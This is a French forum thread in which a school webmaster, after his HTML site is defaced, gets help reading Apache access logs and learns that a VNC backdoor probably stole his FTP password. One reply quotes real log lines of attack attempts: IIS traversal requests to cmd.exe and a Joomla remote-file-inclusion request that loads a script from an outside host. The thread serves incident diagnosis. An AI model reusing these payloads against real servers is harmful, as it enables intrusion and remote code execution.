bonjour
 
ce week end le site du bahut ou je travail a été hacké : on m'a viré le contenu du repertoire et remplacé par du porno (super , c'est les parents d'eleve qui nous ont prevenus)
j'ai modifié tous les mots de passe mais maintenant je voudrais faire mon enquete (au moins savoir si c'est quelqu'un qu'aurait tripoté mon ordi portable ou si c'est du hacking en bonne et due forme)
le site a ete hacké deux fois et je sais qu'il a été publié vendredi entre 18H  et 20H30  au plus large. J'ai sur ma console d'administration (je suis hebergé par nexlink) les logs de connection, j'ai telechargé en particulier les access_log qui devraient me permettre de connaitre les connection a la console d'admin. . Est ce que ça peut m'etre utile pour retrouver eventuellement  une adresse ip? avec quel soft me conseillez vous de lire ces logs pour avoir des details? car avec le bloc note je n'y comprends rien  
si vous avez des conseils ou des infos, merci je suis plutot mauvais en webmastering

Google -> "apache access_log"
 
1er résultat :
 
http://httpd.apache.org/docs/2.0/logs.html
 

un grep déjà mais sinon je ne pense pas qu'il y ai des outils plus "graphique"

merci a toi moon , mais désolé je n'y pige pas grand chose...d'autant que je pensais qu'apache ne concernait que le monde de linux...
je suis affligé par mon manque de conaissances dans ce domaine
il existe pas juste un soft que je puisse installer puis faire un fichier/ouvrir/access log et le lire dans une interface correcte ( en esperant que j'y pige quelque chose) ?

Et bien tu l'ouvres dans le bloc notes, et tu lis chaque ligne comme indiqué sur la page que je t'ai indiquée.

désolé, mais c'est dur...en anglais en plus, j'ai du mal
comment comprendre une ligne comme ça:[27/Oct/2007:00:15:09 +0100] "GET /imagesactu/noel1.jpg HTTP/1.1" 200 15828 "-" "Googlebot-Image/1.0"
78.114.37.204 - -  
je pensais que les logs access me donneraient les connexion a ma console de gestion...mais ça evoque pleins de fichiers du site

ou alors cette ligne:
27/Oct/2007:14:11:28 +0100] "GET /index.htm HTTP/1.1" 304 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
spider-prs-ta09.proxy.aol.com - -
 
si je comprendsbien,  le 27 a 14h quelqu'un a modifié index .htm. et son IP n'apparait pas car il est derriere un proxy ? (spider-prs-ta09.proxy.aol.com)
 
merci pour votre aide les amis, je suis vraiment tres enmer embeté

Les logs Apache te communiquent les accès aux fichiers dispo sur le serveur web, c'est à dire ton site.
 
Donc dans l'ordre :
 

 
En l'occurence c'est le bot google qui indexe ton site.

Là ça te dis que l'ip 78.114.37.204 qui est le bot google a accédé avec succès (200) à l'image noel1.jpg qui fait 15828 octets le 27 octobre à minuit 15

vous avez bien de la chance de parler cette langue
est ce qu' a votre avis il y a moyen avec ces fichiers access log de savoir un peu ce qui nous est arrivé, d'avoir des infos sur le hacker ?

Oui fais une recherche sur la page d'admin.
Cependant peut être que la personne a utilisé un autre moyen, la meilleur méthode est de tout checker

qu'est ce que la page d'admin ?

bah c'est toi qui parle de console d'admin

pardon, je m'exprime mal : comment faire une recherche precisement sur la page d'admin ?

il y'a personne qui aurait la patience d'aider un newbie comme moi ?
vous comprenez ce qui est arrivé etait assez humiliant pour notre ecole et j'aimerais savoir si la securité de nexlink laisse a desirer

C'est un site cree de toutes pieces par toi ou un collegue, un site base sur de l'existant, statique ou dynamique ?

salut les amis
je reviens a la charge avec plus d'explications:

tout d'abord le site , c'est un site en html tout bete que j'ai fait et que j'administre

j'ai trouvé un trojan sur une des machines que j'utilise pour publier le site , il s'agit de backdoor win32 vnc
ç'est probablement la source du probleme

pour les logs: mon probleme etait que dans le bloc note il n'yavait aucun saut de ligne, j'ai ouvert ça dans firefox et là, miracle, j'y vois beaucoup plus claire

il n'a pas grand chose sur ces logs...surtout des get, mais il y'a UN truc , qui je pense est important

à 16h46 , heure ou je suis en bagnole en train de rentrer chez moi, voila ce qu'il y'a:
*APoitiers-154-1-14-95.w86-196.abo.wanadoo.fr - - [26/Oct/2007:16:46:57 +0100] "_POST /index.htm HTTP/1.1_" 200 4753 "http://..........." "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8"

donc si je me trompe pas, c'est un accés a la console d'admin , c'est le fichier index qui est publié
j'ajoutequ'on m'a prevenu que le site etait hacké vers 17h, ça correspond

est ce que je tiens mon gars ?
qu'est ce que je fais maintenant les amis?

Tu combles la faille...

ment@l -> si tu mets l'adresse de ta console d'administration, c'est encore la meilleure façon de se faire hacker...

mince...
mais j'ai quand meme viré le trojan et changé tous les mots de passe  

sinon...personne ne voudrait m'aider en repondant a cette question :
le log que j'ai posté me permet il d'etre sur de bien tenir le gars qui m'a hacké le site ? (dans la mesure ou c'est un acces console, et que ce n'est pas moi...)

bon...ben je suis étonné , personne ne veut m'apporter la moindre aide sur ce coup?

Une console d'admin en racine du serveur http, c'est pas malin malin

sinon, je pense sincèrement que les logs ftp te seront plus utiles que tes logs apache  
surtout si on a piraté une machine client avec un backdoor vnc et que ton site est en html sans langage de prog derrière ton pirate a pompé les passwords de ton client ftp (c'est pas bien de les sauvegarder) et a du se connecter tout simplement... parce que remplacer des fichiers sur un apache sans cgi/php/perl derrière, c'est un peu dur ...

Tu aurais eu une attaque par apache, ca ressemblerais plus a des trucs du genre .. (avec des codes 200 a la fin )

218.92.63.250 - - [28/Sep/2006:17:16:17 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:19 +0200] "GET /scripts/root.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:20 +0200] "GET /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:46 +0200] "GET /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
218.92.63.250 - - [28/Sep/2006:17:16:47 +0200] "GET /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir" 404 -
210.245.226.61 - - [24/Mar/2007:13:01:02 +0100] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 232

 
merci pour ton aide manaloup
 
pour la console d'admin a la racine du site, je crois que c'est nexlink, l'hebergeur qui decide ce genre de chose, non?
 
pour les logs, c'est les seuls que j'ai trouvé sur la console d'admin, et nexlink sont pas tres conciliants, surtout quand ils sentent qu'ils ont affaire  a un newb
 
le backdoor vnc, comment j'ai pu le choper, a il kek chose a voir avec ultravnc (que j'utilise)
 
merci pour le conseil cocernant le mot de passe ftp, je l'applique illico
 
pour ce qui est du log que j'ai affiché , le post index par la console d'admin a 16H46, est ce que tu pense que c'est mon pirate ?

ApHeMo - Apache Health Monitoring

http://www.xxxxxxxxxxxxxxxxxxx.com/?aphemo
J'en suis le développeur, tu peux me contacter si t'as besoin d'un coup de main avec l'appli.